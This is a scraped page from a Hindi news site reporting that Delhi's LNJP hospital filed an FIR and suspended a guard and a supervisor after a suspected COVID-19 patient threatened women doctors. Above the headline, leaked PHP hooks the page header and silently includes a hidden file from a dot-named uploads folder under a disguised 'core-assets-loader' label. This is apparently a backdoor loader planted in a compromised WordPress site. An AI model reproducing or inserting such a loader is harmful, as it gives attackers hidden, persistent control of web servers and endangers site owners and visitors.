add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); डॉक्टर से बदसलूकी पर FIR दर्ज, अस्पताल के सुरक्षा गार्ड और सुपरवाइजर सस्पेंड – SOCH INDIA
Menu

देश
डॉक्टर से बदसलूकी पर FIR दर्ज, अस्पताल के सुरक्षा गार्ड और सुपरवाइजर सस्पेंड

nobanner

दिल्ली के एलएनजेपी अस्पताल में महिला डॉक्टरों के साथ बदसलूकी मामले में अस्पताल प्रशासन ने एफआईआर दर्ज करा दी है. अस्पताल प्रशासन ने कार्रवाई करते हुए सिक्योरिटी गार्ड और सुपरवाइजर को सस्पेंड कर दिया है. इसके अलावा अस्पताल में सुरक्षा बढ़ा दी गई है.

इस मामले में बयान जारी कर एलएनजेपी अस्पताल प्रशासन ने कहा है कि घटना के बाद प्रतिक्रिया देने में मौके पर तैनात सुरक्षाकर्मी और पुलिस जवानों ने देरी की है.

बता दें कि मंगलवार को एलएनजेपी अस्पताल में तबलीगी जमात से जुड़े कोरोना वायरस के संदिग्ध मरीज ने खाने को लेकर हंगामा किया था. जानकारी के मुताबिक घटना के दौरान एक मरीज ने महिला डॉक्टर के साथ गाली गलौज की और वो हिंसक हो गया. इस दौरान ये मरीज डॉक्टर को धमकियां देने लगा. मरीज को भड़कता देख डॉक्टर डर गईं तो उन्होंने कमरे का दरवाजा अंदर से बंद कर लिया.